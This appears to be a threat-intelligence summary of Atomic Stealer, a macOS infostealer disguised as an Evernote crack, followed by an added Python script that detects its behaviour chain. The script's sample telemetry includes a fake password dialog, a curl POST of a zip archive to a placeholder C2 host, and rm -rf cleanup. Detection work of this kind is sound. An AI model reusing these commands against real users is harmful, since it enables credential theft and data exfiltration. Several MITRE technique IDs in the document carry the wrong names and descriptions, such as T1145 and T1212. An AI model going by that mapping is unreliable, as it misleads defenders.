Atomic Stealer Malware Disguised as Crack Program (macOS)

The AhnLab Security Intelligence Center has identified the Atomic Stealer malware, disguised as an Evernote crack program, that targets macOS users to steal sensitive data. It is distributed via malicious installation files (pkg and dmg) and includes a shell script that bypasses Gatekeeper warnings. (Affected: macOS, users downloading unofficial software)

Key points:

  • Atomic Stealer is information-stealing malware specifically for macOS.
  • It is disguised as the Evernote Crack program.
  • Distributed through installation files like pkg and dmg.
  • The distribution site checks the browser's User-Agent and redirects users to an OS-specific download.
  • Includes a shell script that bypasses Gatekeeper warnings on macOS.
  • Collects sensitive information such as passwords and system data.
  • Checks whether it is running in a virtual machine before executing.
  • Uses a warning message to prompt users for their system password.
  • Collects information into a directory and compresses it into a zip file.
  • Data is sent to the threat actor’s server and then deleted from the victim’s machine.
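The chain in the key points above (password prompt, collection into a zip archive, HTTP POST to the attacker's server, deletion of the archive) lends itself to behavioural correlation on endpoint telemetry. The following is an added example, not code from the ASEC article: it assumes a hypothetical EDR export of process events as JSON lines (fields `ts`, `ppid`, `pid`, `cmd`) and the sample events are constructed, with the C2 host replaced by a placeholder.

```python
"""Correlate constructed macOS process events into the Atomic Stealer-style
behaviour chain: password dialog -> zip archive -> HTTP POST -> cleanup."""
import json
from collections import defaultdict

# Constructed EDR-style telemetry (hypothetical schema, not real logs).
SAMPLE_EVENTS = """\
{"ts": 1, "ppid": 10, "pid": 11, "cmd": "/bin/sh /Volumes/Installer/.install.sh"}
{"ts": 2, "ppid": 11, "pid": 12, "cmd": "osascript -e 'display dialog \\"macOS needs your password\\" default answer \\"\\" with hidden answer'"}
{"ts": 3, "ppid": 11, "pid": 13, "cmd": "zip -r /tmp/out.zip /tmp/collect"}
{"ts": 4, "ppid": 11, "pid": 14, "cmd": "curl -X POST --data-binary @/tmp/out.zip http://C2-PLACEHOLDER.invalid/"}
{"ts": 5, "ppid": 11, "pid": 15, "cmd": "rm -rf /tmp/out.zip /tmp/collect"}
{"ts": 6, "ppid": 20, "pid": 21, "cmd": "zip -r backup.zip Documents"}
"""

# One predicate per stage of the described chain, in the order it occurs.
STAGES = {
    "password_prompt": lambda c: "osascript" in c and "hidden answer" in c,
    "archive":         lambda c: c.startswith("zip ") or " zip " in c,
    "exfil_post":      lambda c: "curl" in c and ("-X POST" in c or "--data" in c),
    "cleanup":         lambda c: c.startswith("rm "),
}

def parse_events(text):
    """Parse JSON-lines telemetry into dicts sorted by timestamp."""
    return sorted((json.loads(l) for l in text.splitlines() if l.strip()),
                  key=lambda e: e["ts"])

def correlate(events, min_stages=3):
    """Group child processes by parent pid and report parents whose children
    hit at least `min_stages` stages in chain order; a lone zip or rm on its
    own (pid 20 above) never reaches the threshold."""
    seen = defaultdict(list)  # parent pid -> stages matched, first-seen order
    for ev in events:
        for name, match in STAGES.items():
            if match(ev["cmd"]) and name not in seen[ev["ppid"]]:
                seen[ev["ppid"]].append(name)
    order = list(STAGES)
    hits = {}
    for ppid, stages in seen.items():
        idx = [order.index(s) for s in stages]
        if len(stages) >= min_stages and idx == sorted(idx):
            hits[ppid] = stages
    return hits

if __name__ == "__main__":
    for ppid, stages in correlate(parse_events(SAMPLE_EVENTS)).items():
        print(f"parent pid {ppid}: {' -> '.join(stages)}")
```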

MITRE Techniques:

  • T1071.001 – Application Layer Protocol: Utilizes HTTP to communicate data to remote servers.
  • T1145 – Denial of Service: Redirects users to malicious websites based on UserAgent checks.
  • T1083 – File and Directory Discovery: Collects system information and scans for files in user directories.
  • T1212 – Exploitation of Remote Services: Bypasses user security warnings to execute malicious scripts.
  • T1070.004 – Indicator Removal on Host: Deletes itself after data exfiltration.

Indicators of Compromise:

  • The article lists MD5 hashes of the malware variants, which can be used to identify the Atomic Stealer executables.
  • It provides URLs associated with the malware distribution, which can serve as IOCs for blocking or further investigation.
  • The exfiltration method, POST requests to specific C2 servers, can help identify compromised systems in network logs.
  • The described collection of user passwords points to the credential-theft indicators to look for on affected hosts.


Full Story: https://asec.ahnlab.com/en/87797/